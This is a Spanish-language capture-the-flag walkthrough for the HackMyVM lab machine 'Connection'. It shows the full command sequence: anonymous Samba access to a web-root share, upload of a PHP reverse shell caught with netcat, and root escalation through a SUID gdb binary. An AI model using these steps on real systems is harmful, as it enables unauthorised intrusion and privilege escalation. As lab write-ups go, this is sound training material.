[HackMyVM] Connection

Hoy vamos a hackear la maquina de HackMyVM llamada Connection. Podeis registraros y descargarla desde el siguiente enlace: Connection



Empezamos con un nmap para ver que puertos tiene abiertos.

~ > nmap -A -p-                                                  
✘ INT 7s
Starting Nmap 7.70 ( https://nmap.org ) at 2020-10-05 12:34 CEST
Nmap scan report for
Host is up (0.00061s latency).
Not shown: 65531 closed ports
22/tcp  open  ssh         OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 b7:e6:01:b5:f9:06:a1:ea:40:04:29:44:f4:df:22:a1 (RSA)
|   256 fb:16:94:df:93:89:c7:56:85:84:22:9e:a0:be:7c:95 (ECDSA)
|_  256 45:2e:fb:87:04:eb:d1:8b:92:6f:6a:ea:5a:a2:a1:1c (ED25519)
80/tcp  open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
Service Info: Host: CONNECTION; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 1h19m58s, deviation: 2h18m33s, median: -1s
|_nbstat: NetBIOS name: CONNECTION, NetBIOS user: , NetBIOS MAC: 
| smb-os-discovery: 
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: connection
|   NetBIOS computer name: CONNECTION\x00
|   Domain name: \x00
|   FQDN: connection
|_  System time: 2020-10-05T06:35:05-04:00
| smb-security-mode: 
|   account_used: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-05 12:35:05
|_  start_date: N/A

Service detection performed. Please report any incorrect results at 
https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.44 seconds
Vemos que tiene abiertos el puerto de SSH, Samba y HTTP. Echamos un vistazo a Samba.

~ > smbclient -L                                                 
mkdir failed on directory /var/run/samba/msg.lock: Permiso denegado
Unable to initialize messaging context
Enter WORKGROUP\sml's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	share           Disk      
	print$          Disk      Printer Drivers
	IPC$            IPC       IPC Service (Private Share for uploading 
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
Hay una carpeta llamada "share", investigamos un poco mas....

~ > smbclient \\\\\\share
mkdir failed on directory /var/run/samba/msg.lock: Permiso denegado
Unable to initialize messaging context
Enter WORKGROUP\sml's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Wed Sep 23 03:48:39 2020
  ..                                  D        0  Wed Sep 23 03:48:39 2020
  html                                D        0  Wed Sep 23 04:20:00 2020

		7158264 blocks of size 1024. 5463328 blocks available
smb: \> cd html
smb: \html\> dir
  .                                   D        0  Wed Sep 23 04:20:00 2020
  ..                                  D        0  Wed Sep 23 03:48:39 2020
  index.html                          N    10701  Wed Sep 23 03:48:45 2020

		7158264 blocks of size 1024. 5463328 blocks available
smb: \html\>
Vemos que dentro de "share" hay una carpeta llamada "html" y dentro se encuentra index.html. Todo apunta a que es la carpeta a la que accede el servidor web, con lo cual vamos a subir una reverse shell al samba y ver si desde la web podemos ejecutarla :) Preparamos nuestra reverse shell.

~ > cp /usr/share/webshells/php/php-reverse-shell.php .
~ > mv php-reverse-shell.php rshell.php
~ > nano rshell.php #Configuramos IP-PUERTO.
Subimos la reverse shell.

smb: \html\> put rshell.php
putting file rshell.php as \html\rshell.php (1788,7 kb/s) (average 1788,7 kb/s)
Ponemos nc a la escucha!

~ > nc -nlvp 1234
listening on [any] 1234 ...
Y visitamos

Low Shell

Obtenemos nuestra reverse shell :)

~ > nc -nlvp 1234
listening on [any] 1234 ...
connect to [] from (UNKNOWN) [] 58858
Linux connection 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 
 06:37:23 up 4 min,  0 users,  load average: 0.00, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
Una vez dentro, exploramos un poco el sistema y miramos los ficheros que tiene con SUID.

Privilege Escalation

www-data@connection:/$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
Vemos que el binario gdb esta en la lista, y dicho binario podemos usarlo para escalar privilegios!

www-data@connection:/$ gdb -nx -ex 'python import os; os.execl("/bin/sh", "sh", 
"-p")' -ex quit

This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.
Type "show copying" and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
Find the GDB manual and other documentation resources online at:

For help, type "help".
Type "apropos word" to search for commands related to "word".
# id
uid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) 


# cd /root
# ls
# cut -c-5 proof.txt


Y con esto ya seriamos root de la maquina.